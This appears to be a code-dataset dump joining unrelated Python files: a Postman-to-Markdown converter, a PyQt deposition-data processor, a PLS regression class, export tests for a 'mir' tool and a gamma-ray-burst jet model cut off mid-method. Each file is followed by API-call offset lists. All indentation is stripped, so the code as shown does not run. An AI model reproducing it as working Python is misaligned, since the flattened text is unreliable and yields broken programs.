with open(markdowndocname, 'w', encoding='UTF-8') as f:
f.write('# ' + content['info']['name'] + '\n')
for item in content['item']:
custom_print(68)
f.write('## ' + item['request']['method'] + ' ' + item['name'] + '\n')
f.write(item['request']['url']['raw'] + '\n')
try:
formdata = item['request']['body']['formdata']
except KeyError:
pass
else:
if formdata:
f.write('### ' + 'BODY formdata' + '\n')
f.write('参数名|参数值' + '\n')
f.write('---:|---:|' + '\n')
for i in formdata:
custom_print(72)
f.write(i['key'] + '|' + i['value'] + '\n')
with open(postman_varname, 'r', encoding='UTF-8') as f:
content = json.load(f)
with open(postman_varname_global, 'r', encoding='UTF-8') as f2:
content2 = json.load(f2)
key_values = {value['key']: value['value'] for value in content['values']}
key2_values = {value['key']: value['value'] for value in content2['values']}
key_values.update(key2_values)
with open(markdowndocname, 'r', encoding='UTF-8') as f1:
content1 = f1.read()
for k, v in key_values.items():
custom_print(k, v)
if k in content1:
custom_print(k)
content1 = content1.replace('{{' + k + '}}', v)
with open(markdowndocname, 'w', encoding='UTF-8') as f2:
f2.write(content1)
if __name__ == '__main__':
postman_to_markdown('logreport.postman_collection.json', 'logreport_outer_net.postman_environment.json', 'global.postman_environment.json')
|
[
"random.random",
"json.load",
"sys._getframe",
"time.time"
] |
[((621, 632), 'time.time', 'time.time', ([], {}), '()\n', (630, 632), False, 'import time\n'), ((1035, 1048), 'json.load', 'json.load', (['f1'], {}), '(f1)\n', (1044, 1048), False, 'import json\n'), ((1990, 2002), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1999, 2002), False, 'import json\n'), ((2090, 2103), 'json.load', 'json.load', (['f2'], {}), '(f2)\n', (2099, 2103), False, 'import json\n'), ((222, 237), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (235, 237), False, 'import sys\n'), ((648, 656), 'random.random', 'random', ([], {}), '()\n', (654, 656), False, 'from random import random\n')]
|
# <NAME> and <NAME>
# Created: 6/05/2013
# Last Updated: 6/14/2013
# For JCAP
import numpy as np
from PyQt4 import QtCore
from dictionary_helpers import *
import date_helpers
import filename_handler
import datareader
# global dictionary holds all processed (z, x, y, rate) data for the experiment
DEP_DATA = []
zndec = 1
tndec = 0
radius1 = 28.
radius2 = 45.
""" does all of the data processing necessary for deposition plots """
class ProcessorThread(QtCore.QThread):
# transfers new line from reader to MainMenu
lineRead = QtCore.pyqtSignal(list)
# transfers new processed data to deposition graph
newData = QtCore.pyqtSignal(tuple)
srcError = QtCore.pyqtSignal(int)
def __init__(self, parent=None, filename='default.csv'):
super(ProcessorThread, self).__init__()
self.file = filename
self.rowBuffer = []
self.changeZ = False
self.running = True
self.reader = datareader.DataReader(parent=self, filename=self.file)
self.reader.lineRead.connect(self.newLineRead)
def run(self):
self.reader.start()
# initialize DATA_DICT column numbers used for data processing
try:
self.tcolnum = getCol('Src%d Motor Tilt Position' %int(filename_handler.FILE_INFO['Source']))
except IndexError:
self.srcError.emit(int(filename_handler.FILE_INFO['Source']))
self.zcolnum = getCol('Platen Zshift Motor 1 Position')
self.anglecolnum = getCol('Platen Motor Position')
while self.running:
pass
""" called whenever the reader sends a full line """
def newLineRead(self, newRow):
self.lineRead.emit(newRow)
self.processRow(newRow)
""" adds a new row to its own row buffer and processes the
data in the row buffer if the azimuth or z-value of the
instrument has changed """
def processRow(self, row):
if self.rowBuffer == []:
self.rowBuffer += [row]
else:
angle = round(float(row[self.anglecolnum]))
zval = round(float(row[self.zcolnum]), 2)
prevangle = round(float(self.rowBuffer[-1][self.anglecolnum]), 0)
prevz = round(float(self.rowBuffer[-1][self.zcolnum]), 2)
if (angle == prevangle and zval == prevz):
self.rowBuffer += [row]
elif (angle == prevangle):
self.processData(prevz, prevangle, radius1)
self.processData(prevz, prevangle, radius2)
# indicates that center point will need to be
# computed in next round of processing
self.changeZ = True
# reset row buffer
self.rowBuffer = [row]
else:
self.processData(zval, prevangle, radius1)
self.processData(zval, prevangle, radius2)
self.rowBuffer = [row]
""" processes all rates at the same angle and z-value
to produce a single (z, x, y, rate) data point """
def processData(self, z, angle, radius):
global DEP_DATA
rowRange = self.getRowRange()
# only one or two data points indicates a transitional angle
# that can be ignored - Savitzky Golay can be used in the future
if rowRange[1] - rowRange[0] <= 2:
pass
else:
# get only valid rows from buffer
dataArray = self.rowBuffer[rowRange[0]:(rowRange[1]+1)]
# transpose matrix so that each column in the
# spreadsheet becomes a row
dataArrayT = np.array(dataArray).T
timespan = self.getTimeSpan(dataArrayT)
depRates = self.getDepRates(timespan, dataArrayT)
# normalize based on drifting center point
rate0 = self.getXtalRate(3, dataArrayT).mean()
rate = rate0
if radius == radius1:
if angle == 0 or self.changeZ:
# plot center point along with first set
# of data for this z-value
DEP_DATA.append((z, 0.0, 0.0, rate))
self.newData.emit((z, 0.0, 0.0, rate))
self.changeZ = False
x = radius * np.cos(angle * np.pi/180.)
y = radius * np.sin(angle * np.pi/180.)
# rate1 corresponds to Xtal4 Rate
rate = rate0 * depRates[2]/depRates[1]
else:
x = radius * np.cos(angle * np.pi/180. + np.pi)
y = radius * np.sin(angle * np.pi/180. + np.pi)
# rate2 corresponds to Xtal2 Rate
rate = rate0 * depRates[0]/depRates[1]
# store data points for initializing new graph
DEP_DATA.append((z, x, y, rate))
# indicate to exisiting graphs that there is
# new data to display
self.newData.emit((z, x, y, rate))
""" helper function to correct for instrument noise in measuring z-value """
def roundZ(self, zcol):
zrnd=np.round(zcol, decimals=zndec)
for i, zval in enumerate(zrnd):
if zval not in filename_handler.FILE_INFO['Z_mm']:
zrnd[i] = -1
return zrnd
""" helper function to correct for instrument noise in measuring tilt """
def roundT(self, tcol):
trnd=np.round(tcol, decimals=tndec)
for i, tval in enumerate(trnd):
if tval not in filename_handler.FILE_INFO['TiltDeg']:
trnd[i] = -1
return trnd
""" gets range of valid rows in row buffer based on
whether z and t values match experimental parameters """
def getRowRange(self):
data = np.array(self.rowBuffer)
datacols = data.T
zcol = map(float, datacols[self.zcolnum])
tcol = map(float, datacols[self.tcolnum])
inds_useful=np.where((self.roundZ(zcol)>=0)&(self.roundT(tcol)>=0))[0]
# if rowRange is nonzero, send it
if inds_useful.size:
return (inds_useful[0], inds_useful[-1])
# otherwise, send dummy rowRange to processData
return (0, 0)
""" gets time span of valid data set for given angle and z-value """
def getTimeSpan(self, dataArrayT):
datecol = getCol('Date')
timecol = getCol('Time')
datetimeTup = zip(dataArrayT[datecol], dataArrayT[timecol])
startStr = datetimeTup[0][0] + ' ' + datetimeTup[0][1]
endStr = datetimeTup[-1][0] + ' ' + datetimeTup[-1][1]
durationObj = date_helpers.dateObjFloat(endStr) - date_helpers.dateObjFloat(startStr)
return durationObj.total_seconds()
""" helper function to return column of Xtal rates from valid data set """
def getXtalRate(self, ratenum, dataArrayT):
rcolnum = getCol('Xtal%d Rate' % ratenum)
return np.array(map(float, dataArrayT[rcolnum]))
""" helper function to compute all deposition rates
as time-averaged Xtal rates """
def getDepRates(self, timespan, dataArrayT):
depRates = []
for x in range(2,5):
rateData = self.getXtalRate(x, dataArrayT)
rateDiff = rateData[-1] - rateData[0]
depRates += [rateDiff/timespan]
return depRates
""" re-initializes data sets and reader when a new
spreadsheet file is loaded """
def newFile(self, newfile):
global DEP_DATA
DEP_DATA = []
self.rowBuffer = []
if self.reader:
self.reader.end()
self.reader = datareader.DataReader(parent=self, filename=newfile)
self.reader.lineRead.connect(self.newLineRead)
self.reader.start()
# re-initialize DATA_DICT column numbers used for data processing
try:
self.tcolnum = getCol('Src%d Motor Tilt Position' %int(filename_handler.FILE_INFO['Source']))
except IndexError:
self.srcError.emit(int(filename_handler.FILE_INFO['Source']))
self.zcolnum = getCol('Platen Zshift Motor 1 Position')
self.anglecolnum = getCol('Platen Motor Position')
""" empties row buffer and kills reader when experiment has ended """
def onEndExperiment(self):
if self.rowBuffer:
angle = round(float(self.rowBuffer[0][self.anglecolnum]))
zval = round(float(self.rowBuffer[0][self.zcolnum]), 1)
self.processData(zval, angle, radius1)
self.processData(zval, angle, radius2)
self.rowBuffer = []
if self.reader:
self.reader.end()
self.reader = None
""" kills both the reader and data processor threads;
called when application exits """
def end(self):
if self.reader:
self.reader.end()
self.running = False
|
[
"date_helpers.dateObjFloat",
"numpy.sin",
"numpy.array",
"datareader.DataReader",
"numpy.cos",
"numpy.round",
"PyQt4.QtCore.pyqtSignal"
] |
[((538, 561), 'PyQt4.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['list'], {}), '(list)\n', (555, 561), False, 'from PyQt4 import QtCore\n'), ((631, 655), 'PyQt4.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['tuple'], {}), '(tuple)\n', (648, 655), False, 'from PyQt4 import QtCore\n'), ((671, 693), 'PyQt4.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['int'], {}), '(int)\n', (688, 693), False, 'from PyQt4 import QtCore\n'), ((944, 998), 'datareader.DataReader', 'datareader.DataReader', ([], {'parent': 'self', 'filename': 'self.file'}), '(parent=self, filename=self.file)\n', (965, 998), False, 'import datareader\n'), ((5046, 5076), 'numpy.round', 'np.round', (['zcol'], {'decimals': 'zndec'}), '(zcol, decimals=zndec)\n', (5054, 5076), True, 'import numpy as np\n'), ((5349, 5379), 'numpy.round', 'np.round', (['tcol'], {'decimals': 'tndec'}), '(tcol, decimals=tndec)\n', (5357, 5379), True, 'import numpy as np\n'), ((5699, 5723), 'numpy.array', 'np.array', (['self.rowBuffer'], {}), '(self.rowBuffer)\n', (5707, 5723), True, 'import numpy as np\n'), ((7523, 7575), 'datareader.DataReader', 'datareader.DataReader', ([], {'parent': 'self', 'filename': 'newfile'}), '(parent=self, filename=newfile)\n', (7544, 7575), False, 'import datareader\n'), ((6526, 6559), 'date_helpers.dateObjFloat', 'date_helpers.dateObjFloat', (['endStr'], {}), '(endStr)\n', (6551, 6559), False, 'import date_helpers\n'), ((6562, 6597), 'date_helpers.dateObjFloat', 'date_helpers.dateObjFloat', (['startStr'], {}), '(startStr)\n', (6587, 6597), False, 'import date_helpers\n'), ((3592, 3611), 'numpy.array', 'np.array', (['dataArray'], {}), '(dataArray)\n', (3600, 3611), True, 'import numpy as np\n'), ((4242, 4271), 'numpy.cos', 'np.cos', (['(angle * np.pi / 180.0)'], {}), '(angle * np.pi / 180.0)\n', (4248, 4271), True, 'import numpy as np\n'), ((4298, 4327), 'numpy.sin', 'np.sin', (['(angle * np.pi / 180.0)'], {}), '(angle * np.pi / 180.0)\n', (4304, 4327), True, 'import numpy as np\n'), ((4477, 4514), 'numpy.cos', 'np.cos', (['(angle * np.pi / 180.0 + np.pi)'], {}), '(angle * np.pi / 180.0 + np.pi)\n', (4483, 4514), True, 'import numpy as np\n'), ((4541, 4578), 'numpy.sin', 'np.sin', (['(angle * np.pi / 180.0 + np.pi)'], {}), '(angle * np.pi / 180.0 + np.pi)\n', (4547, 4578), True, 'import numpy as np\n')]
|
from __future__ import print_function
import numpy as np
from ._PLSbase import plsbase as pls_base
from .utilities import nanmatprod, isValid
from .engines import pls as pls_engine
class pls(pls_base):
"""
This is the classic multivariate NIPALS PLS algorithm.
Parameters:
X: {N, P} array like
a table of N observations (rows) and P variables (columns) - The explanatory variables,
Y: {N, Q} array like
a table of N observations (rows) and Q variables (columns) - The dependent variables,
a: int
the number of PLS component to be fitted
scaling: float, optional
A number typically between 0.0 and 1.0 corresponding to the scaling, typical example are
0.0 corresponds to mean centring
0.5 corresponds to Pareto scaling
1.0 corresponds to unit variance scaling
cvfold: int, optional
the number of folds in the cross-validation - default is 7
Returns
-------
out : a pls2 object with a components
Attributes:
W : PLS weights table
T : PLS scores table
P : PLS loadings table
C : PLS score regression coefficients
B : PLS regression coefficients
Yhat: model predicted Y
Yhatcv: cross-validation predicted Y
R2Y: Determination coefficients of Y
Q2Ycol: Cross validation parameters per colums of Y
Q2Ycum: Cumulative cross validation parameter
Methods:
scores(n), loadings(n), weights(n)
n: int
component id
return the scores of the nth component
predict(Xnew)
Xnew: array like
new observation with the same number of variables tha X
return predicted Y
"""
def __init__(self, X, Y, ncp=1, cvfold=None, scaling=0):
pls_base.__init__(self, X, Y, ncp=ncp, scaling=scaling, cvfold=cvfold)
self.model = "pls"
missingValues = False
if self.missingValuesInX or self.missingValuesInY:
# TODO: For now nissing values in both X and Y are dealt the same way -> Improve this
missingValues = True
self.T, self.U, self.P, self.W, self.C, self.B = pls_engine(self.X, self.Y, self.ncp, missing_values=missingValues)
self.Wstar = self.W @ np.linalg.inv(self.P.T @ self.W)
self.Yhat = self.predict(self.X, preprocessing=False)
self.R2Y, self.R2Ycol = self._calculateR2Y(self.Yhat)
self.cross_validation(ncp=ncp)
self.R2X = np.sum(np.square(self.T @ self.P.T))/self.SSX
def predict(self, Xnew, preprocessing=True, statistics=False, **kwargs):
Xnew, nnew, pxnew = isValid(Xnew, forPrediction=True)
if preprocessing:
Xnew = (Xnew - self.Xbar)
Xnew /= np.power(self.Xstd, self.scaling)
assert pxnew == self.px, "New observations do not have the same number of variables!!"
if statistics:
That = Xnew @ self.W
Xpred = That @ self.P.T
Xres = Xnew - Xpred
Xnew2 = np.square(Xres)
if np.isnan(Xnew2).any():
ssrx = np.nansum(Xnew2, axis=0)
else:
ssrx = np.sum(Xnew2, axis=0)
stats = {'That':That, 'ESS':ssrx}
if self.B is not None:
# Yhat = Xnew @ self.B
if self.missingValuesInX:
Yhat = nanmatprod(Xnew, self.B)
else:
Yhat = Xnew @ self.B
if preprocessing:
Yhat = Yhat * np.power(self.Ystd, self.scaling) + self.Ybar
else:
Yhat = None
if statistics:
return Yhat, stats
else:
return Yhat
|
[
"numpy.nansum",
"numpy.sum",
"numpy.power",
"numpy.square",
"numpy.isnan",
"numpy.linalg.inv"
] |
[((2506, 2538), 'numpy.linalg.inv', 'np.linalg.inv', (['(self.P.T @ self.W)'], {}), '(self.P.T @ self.W)\n', (2519, 2538), True, 'import numpy as np\n'), ((3002, 3035), 'numpy.power', 'np.power', (['self.Xstd', 'self.scaling'], {}), '(self.Xstd, self.scaling)\n', (3010, 3035), True, 'import numpy as np\n'), ((3285, 3300), 'numpy.square', 'np.square', (['Xres'], {}), '(Xres)\n', (3294, 3300), True, 'import numpy as np\n'), ((2728, 2756), 'numpy.square', 'np.square', (['(self.T @ self.P.T)'], {}), '(self.T @ self.P.T)\n', (2737, 2756), True, 'import numpy as np\n'), ((3367, 3391), 'numpy.nansum', 'np.nansum', (['Xnew2'], {'axis': '(0)'}), '(Xnew2, axis=0)\n', (3376, 3391), True, 'import numpy as np\n'), ((3433, 3454), 'numpy.sum', 'np.sum', (['Xnew2'], {'axis': '(0)'}), '(Xnew2, axis=0)\n', (3439, 3454), True, 'import numpy as np\n'), ((3321, 3336), 'numpy.isnan', 'np.isnan', (['Xnew2'], {}), '(Xnew2)\n', (3329, 3336), True, 'import numpy as np\n'), ((3788, 3821), 'numpy.power', 'np.power', (['self.Ystd', 'self.scaling'], {}), '(self.Ystd, self.scaling)\n', (3796, 3821), True, 'import numpy as np\n')]
|
import os
import shutil
from typing import List, Tuple
import unittest
from google.protobuf import json_format
from mir.commands import exporting
from mir.protos import mir_command_pb2 as mirpb
from mir.tools import hash_utils, mir_storage_ops
from mir.tools.code import MirCode
from tests import utils as test_utils
class TestCmdExport(unittest.TestCase):
# life cycle
def __init__(self, methodName: str) -> None:
super().__init__(methodName=methodName)
self._test_root = test_utils.dir_test_root(self.id().split('.')[-3:])
self._assets_location = os.path.join(self._test_root, 'assets_location')
self._dest_root = os.path.join(self._test_root, 'export_dest')
self._gt_root = os.path.join(self._dest_root, 'gt_dir')
self._mir_root = os.path.join(self._test_root, 'mir-repo')
def setUp(self) -> None:
self.__prepare_dirs()
test_utils.prepare_labels(mir_root=self._mir_root, names=['freshbee', 'type1', 'person', 'airplane,aeroplane'])
self.__prepare_mir_repo()
self.__prepare_assets()
return super().setUp()
def tearDown(self) -> None:
self.__deprepare_dirs()
return super().tearDown()
# private: prepare env
def __prepare_dirs(self):
test_utils.remake_dirs(self._test_root)
test_utils.remake_dirs(self._assets_location)
test_utils.remake_dirs(self._dest_root)
test_utils.remake_dirs(self._mir_root)
def __deprepare_dirs(self):
if os.path.isdir(self._test_root):
shutil.rmtree(self._test_root)
def __prepare_assets(self):
'''
copy all assets from project to assets_location, assumes that `self._assets_location` already created
'''
image_paths = ['tests/assets/2007_000032.jpg', 'tests/assets/2007_000243.jpg']
sha1sum_path_pairs = [(hash_utils.sha1sum_for_file(image_path), image_path)
for image_path in image_paths] # type: List[Tuple[str, str]]
for sha1sum, image_path in sha1sum_path_pairs:
shutil.copyfile(image_path, os.path.join(self._assets_location, sha1sum))
def __prepare_mir_repo(self):
'''
creates mir repo, assumes that `self._mir_root` already created
'''
test_utils.mir_repo_init(self._mir_root)
test_utils.mir_repo_create_branch(self._mir_root, 'a')
# metadatas
metadatas_dict = {
'attributes': {
'430df22960b0f369318705800139fcc8ec38a3e4': {
'assetType': 'AssetTypeImageJpeg',
'width': 500,
'height': 281,
'imageChannels': 3
},
'a3008c032eb11c8d9ffcb58208a36682ee40900f': {
'assetType': 'AssetTypeImageJpeg',
'width': 500,
'height': 333,
'imageChannels': 3
}
}
}
mir_metadatas = mirpb.MirMetadatas()
json_format.ParseDict(metadatas_dict, mir_metadatas)
# annotations
annotations_dict = {
'task_annotations': {
'a': {
'image_annotations': {
'430df22960b0f369318705800139fcc8ec38a3e4': {
'annotations': [{
'index': 0,
'box': {
'x': 104,
'y': 78,
'w': 272,
'h': 105
},
'class_id': 3,
'score': 1,
'anno_quality': 0.95,
'tags': {'fake tag name': 'fake tag data'},
}, {
'index': 1,
'box': {
'x': 133,
'y': 88,
'w': 65,
'h': 36
},
'class_id': 3,
'score': 1,
'anno_quality': 0.95,
'tags': {'fake tag name': 'fake tag data'},
}, {
'index': 2,
'box': {
'x': 195,
'y': 180,
'w': 19,
'h': 50
},
'class_id': 2,
'score': 1,
'anno_quality': 0.95,
'tags': {'fake tag name': 'fake tag data'},
}, {
'index': 3,
'box': {
'x': 26,
'y': 189,
'w': 19,
'h': 95
},
'class_id': 2,
'score': 1,
'anno_quality': 0.95,
'tags': {'fake tag name': 'fake tag data'},
}],
},
'a3008c032eb11c8d9ffcb58208a36682ee40900f': {
'annotations': [{
'index': 0,
'box': {
'x': 181,
'y': 127,
'w': 94,
'h': 67
},
'class_id': 3,
'score': 1,
'anno_quality': 0.95,
'tags': {'fake tag name': 'fake tag data'},
}],
},
}
}
},
'image_cks': {
'a3008c032eb11c8d9ffcb58208a36682ee40900f': {
'cks': {
'weather': 'sunny',
},
'image_quality': 0.5
},
'430df22960b0f369318705800139fcc8ec38a3e4': {
'cks': {
'weather': 'sunny',
},
'image_quality': 0.3
}
}
}
mir_annotations = mirpb.MirAnnotations()
json_format.ParseDict(annotations_dict, mir_annotations)
# tasks
task = mir_storage_ops.create_task(task_type=mirpb.TaskType.TaskTypeImportData,
task_id='a',
message='test_tools_data_exporter_branch_a')
# save and commit
mir_datas = {
mirpb.MirStorage.MIR_METADATAS: mir_metadatas,
mirpb.MirStorage.MIR_ANNOTATIONS: mir_annotations,
}
mir_storage_ops.MirStorageOps.save_and_commit(mir_root=self._mir_root,
mir_branch='a',
his_branch='master',
mir_datas=mir_datas,
task=task)
def test_normal_00(self):
# normal case: voc:raw
fake_args = type('', (), {})()
fake_args.mir_root = self._mir_root
fake_args.asset_dir = self._dest_root
fake_args.annotation_dir = self._dest_root
fake_args.gt_dir = self._gt_root
fake_args.media_location = self._assets_location
fake_args.src_revs = 'a@a'
fake_args.dst_rev = ''
fake_args.format = 'voc'
fake_args.asset_format = 'raw'
fake_args.in_cis = 'person'
fake_args.work_dir = ''
runner = exporting.CmdExport(fake_args)
result = runner.run()
self.assertEqual(MirCode.RC_OK, result)
# normal case: voc:lmdb
fake_args = type('', (), {})()
fake_args.mir_root = self._mir_root
fake_args.asset_dir = self._dest_root
fake_args.annotation_dir = self._dest_root
fake_args.gt_dir = self._gt_root
fake_args.media_location = self._assets_location
fake_args.src_revs = 'a@a'
fake_args.dst_rev = ''
fake_args.format = 'voc'
fake_args.asset_format = 'lmdb'
fake_args.in_cis = 'person'
fake_args.work_dir = ''
runner = exporting.CmdExport(fake_args)
result = runner.run()
self.assertEqual(MirCode.RC_OK, result)
# abnormal case: no asset_dir, annotation_dir, media_location
fake_args = type('', (), {})()
fake_args.mir_root = self._mir_root
fake_args.asset_dir = ''
fake_args.annotation_dir = ''
fake_args.gt_dir = ''
fake_args.media_location = ''
fake_args.src_revs = 'a@a'
fake_args.dst_rev = '' # too fast, default task_id will be the same as previous one
fake_args.format = 'voc'
fake_args.asset_format = 'raw'
fake_args.in_cis = 'person'
fake_args.work_dir = ''
runner = exporting.CmdExport(fake_args)
result = runner.run()
self.assertNotEqual(MirCode.RC_OK, result)
|
[
"tests.utils.mir_repo_init",
"shutil.rmtree",
"os.path.isdir",
"mir.protos.mir_command_pb2.MirMetadatas",
"tests.utils.prepare_labels",
"mir.protos.mir_command_pb2.MirAnnotations",
"google.protobuf.json_format.ParseDict",
"tests.utils.remake_dirs",
"mir.tools.mir_storage_ops.create_task",
"mir.tools.mir_storage_ops.MirStorageOps.save_and_commit",
"mir.commands.exporting.CmdExport",
"tests.utils.mir_repo_create_branch",
"os.path.join",
"mir.tools.hash_utils.sha1sum_for_file"
] |
[((585, 633), 'os.path.join', 'os.path.join', (['self._test_root', '"""assets_location"""'], {}), "(self._test_root, 'assets_location')\n", (597, 633), False, 'import os\n'), ((660, 704), 'os.path.join', 'os.path.join', (['self._test_root', '"""export_dest"""'], {}), "(self._test_root, 'export_dest')\n", (672, 704), False, 'import os\n'), ((729, 768), 'os.path.join', 'os.path.join', (['self._dest_root', '"""gt_dir"""'], {}), "(self._dest_root, 'gt_dir')\n", (741, 768), False, 'import os\n'), ((794, 835), 'os.path.join', 'os.path.join', (['self._test_root', '"""mir-repo"""'], {}), "(self._test_root, 'mir-repo')\n", (806, 835), False, 'import os\n'), ((904, 1019), 'tests.utils.prepare_labels', 'test_utils.prepare_labels', ([], {'mir_root': 'self._mir_root', 'names': "['freshbee', 'type1', 'person', 'airplane,aeroplane']"}), "(mir_root=self._mir_root, names=['freshbee',\n 'type1', 'person', 'airplane,aeroplane'])\n", (929, 1019), True, 'from tests import utils as test_utils\n'), ((1278, 1317), 'tests.utils.remake_dirs', 'test_utils.remake_dirs', (['self._test_root'], {}), '(self._test_root)\n', (1300, 1317), True, 'from tests import utils as test_utils\n'), ((1326, 1371), 'tests.utils.remake_dirs', 'test_utils.remake_dirs', (['self._assets_location'], {}), '(self._assets_location)\n', (1348, 1371), True, 'from tests import utils as test_utils\n'), ((1380, 1419), 'tests.utils.remake_dirs', 'test_utils.remake_dirs', (['self._dest_root'], {}), '(self._dest_root)\n', (1402, 1419), True, 'from tests import utils as test_utils\n'), ((1428, 1466), 'tests.utils.remake_dirs', 'test_utils.remake_dirs', (['self._mir_root'], {}), '(self._mir_root)\n', (1450, 1466), True, 'from tests import utils as test_utils\n'), ((1511, 1541), 'os.path.isdir', 'os.path.isdir', (['self._test_root'], {}), '(self._test_root)\n', (1524, 1541), False, 'import os\n'), ((2296, 2336), 'tests.utils.mir_repo_init', 'test_utils.mir_repo_init', (['self._mir_root'], {}), '(self._mir_root)\n', (2320, 2336), True, 'from tests import utils as test_utils\n'), ((2345, 2399), 'tests.utils.mir_repo_create_branch', 'test_utils.mir_repo_create_branch', (['self._mir_root', '"""a"""'], {}), "(self._mir_root, 'a')\n", (2378, 2399), True, 'from tests import utils as test_utils\n'), ((3011, 3031), 'mir.protos.mir_command_pb2.MirMetadatas', 'mirpb.MirMetadatas', ([], {}), '()\n', (3029, 3031), True, 'from mir.protos import mir_command_pb2 as mirpb\n'), ((3040, 3092), 'google.protobuf.json_format.ParseDict', 'json_format.ParseDict', (['metadatas_dict', 'mir_metadatas'], {}), '(metadatas_dict, mir_metadatas)\n', (3061, 3092), False, 'from google.protobuf import json_format\n'), ((6870, 6892), 'mir.protos.mir_command_pb2.MirAnnotations', 'mirpb.MirAnnotations', ([], {}), '()\n', (6890, 6892), True, 'from mir.protos import mir_command_pb2 as mirpb\n'), ((6901, 6957), 'google.protobuf.json_format.ParseDict', 'json_format.ParseDict', (['annotations_dict', 'mir_annotations'], {}), '(annotations_dict, mir_annotations)\n', (6922, 6957), False, 'from google.protobuf import json_format\n'), ((6990, 7124), 'mir.tools.mir_storage_ops.create_task', 'mir_storage_ops.create_task', ([], {'task_type': 'mirpb.TaskType.TaskTypeImportData', 'task_id': '"""a"""', 'message': '"""test_tools_data_exporter_branch_a"""'}), "(task_type=mirpb.TaskType.TaskTypeImportData,\n task_id='a', message='test_tools_data_exporter_branch_a')\n", (7017, 7124), False, 'from mir.tools import hash_utils, mir_storage_ops\n'), ((7396, 7539), 'mir.tools.mir_storage_ops.MirStorageOps.save_and_commit', 'mir_storage_ops.MirStorageOps.save_and_commit', ([], {'mir_root': 'self._mir_root', 'mir_branch': '"""a"""', 'his_branch': '"""master"""', 'mir_datas': 'mir_datas', 'task': 'task'}), "(mir_root=self._mir_root,\n mir_branch='a', his_branch='master', mir_datas=mir_datas, task=task)\n", (7441, 7539), False, 'from mir.tools import hash_utils, mir_storage_ops\n'), ((8315, 8345), 'mir.commands.exporting.CmdExport', 'exporting.CmdExport', (['fake_args'], {}), '(fake_args)\n', (8334, 8345), False, 'from mir.commands import exporting\n'), ((8959, 8989), 'mir.commands.exporting.CmdExport', 'exporting.CmdExport', (['fake_args'], {}), '(fake_args)\n', (8978, 8989), False, 'from mir.commands import exporting\n'), ((9646, 9676), 'mir.commands.exporting.CmdExport', 'exporting.CmdExport', (['fake_args'], {}), '(fake_args)\n', (9665, 9676), False, 'from mir.commands import exporting\n'), ((1555, 1585), 'shutil.rmtree', 'shutil.rmtree', (['self._test_root'], {}), '(self._test_root)\n', (1568, 1585), False, 'import shutil\n'), ((1871, 1910), 'mir.tools.hash_utils.sha1sum_for_file', 'hash_utils.sha1sum_for_file', (['image_path'], {}), '(image_path)\n', (1898, 1910), False, 'from mir.tools import hash_utils, mir_storage_ops\n'), ((2111, 2155), 'os.path.join', 'os.path.join', (['self._assets_location', 'sha1sum'], {}), '(self._assets_location, sha1sum)\n', (2123, 2155), False, 'import os\n')]
|
from numpy import *
import joelib.constants.constants as cts
from joelib.physics.synchrotron_afterglow import *
from scipy.stats import binned_statistic
from scipy.interpolate import interp1d
from tqdm import tqdm
class jetHeadUD(adiabatic_afterglow):
###############################################################################################
# Methods for initializing the cells in the jet head
###############################################################################################
def __init__(self, EE, Gam0, nn, epE, epB, pp, DD, steps, evolution, nlayers, joAngle, shell_type='thin', Rb=1.):#, obsAngle=0.0):
self.nlayers = nlayers # Number of layers for the partition
#self.nn1 = nn1 # Number of cells in the first layer
self.__totalCells() # obtain self.ncells
self.joAngle = joAngle # Jet opening angle
#self.obsAngle = obsAngle # Angle of jet axis with respect to line of sight
self.angExt = 2.*pi*(1.-cos(joAngle)) # Solid area covered by the jet head
self.cellSize = self.angExt/self.ncells # Angular size of each cell
self.__makeCells() # Generate the cells: calculate the angular positions of the shells
adiabatic_afterglow.__init__(self, EE, Gam0, nn, epE, epB, pp, DD, steps, evolution, shell_type, Rb)
self.ee = EE/self.ncells # Energy per cell
def __makeCells(self):
"""
This method generates the individual cells: positions of borders between cells
and angular positions of the cells themselves.
"""
self.layer = array([])
self.thetas = array([])
self.phis = array([])
self.cthetas = array([])
self.cphis = array([])
fac1 = arange(0,self.nlayers+1)/float(self.nlayers) # Numerical factor for use during execution
self.thetas = 2.*arcsin(fac1*sin(self.joAngle/4.)) # Calculate the propagation angle with respect to jet axis
for ii in range(self.nlayers): # Loop over layers and populate the arrays
num = self.cellsInLayer(ii)
self.phis = append(self.phis, arange(0,num+1)*2.*pi/num) # Phi value of the edges
self.layer = append(self.layer,ones(num)*(ii+1)) # Layer on which the cells are
self.cthetas = append(self.cthetas,ones(num)*0.5*(self.thetas[ii]+self.thetas[ii+1])) # Central theta values of the cells
self.cphis = append(self.cphis,(arange(0,num)+0.5)*2.*pi/num ) # Central phi values of the cells
#num = int(round(self.cellsInLayer(ii)/2))
#self.layer = append(self.layer,ones(num+1)*(ii+1)) # Layer on which the phi edges are
#self.phis = append(self.phis, arange(0,num+1)*2.*pi/num) # Phi value of the edges
#self.cthetas = append(self.cthetas,ones(num)*0.5*(self.thetas[ii]+self.thetas[ii+1])) # Central theta values
#self.cphis = append(self.cphis,(arange(0,num)+0.5)*pi/num ) # Central phi values
def __totalCells(self):
tot = 0
for ii in range(0,self.nlayers):
tot = tot + self.cellsInLayer(ii)
#tot = tot + int(round(self.cellsInLayer(ii)/2))
self.ncells = tot
###############################################################################################
# Methods used by initializers and for getting different physics and general methods not used by initializers
###############################################################################################
def cellsInLayer(self, ii):
"""
Return number of cells in layer ii
"""
return (2*ii+1)
def obsangle(self, theta_obs):
"""
Return the cosine of the observer angle for the different shockwave segments and and
and observer at and angle theta_obs with respect to the jet axis
(contained in yz plane)
"""
#u_obs_x, u_obs_y, u_obs_z = 0., sin(theta_obs), cos(theta_obs)
u_obs_y, u_obs_z = sin(theta_obs), cos(theta_obs)
#seg_x =
seg_y = sin(self.cthetas)*sin(self.cphis)
seg_z = cos(self.cthetas)
#return arccos(u_obs_x*seg_x + u_obs_y*seg_y + u_obs_z*seg_z)
return u_obs_y*seg_y + u_obs_z*seg_z
def obsangle_cj(self, theta_obs):
"""
Return the cosine of the observer angle for the different shockwave
segments in the counter jet and observer at an angle theta_obs with respect to the jet axis
(contained in yz plane)
"""
#u_obs_x, u_obs_y, u_obs_z = 0., sin(theta_obs), cos(theta_obs)
u_obs_y, u_obs_z = sin(theta_obs), cos(theta_obs)
#seg_x =
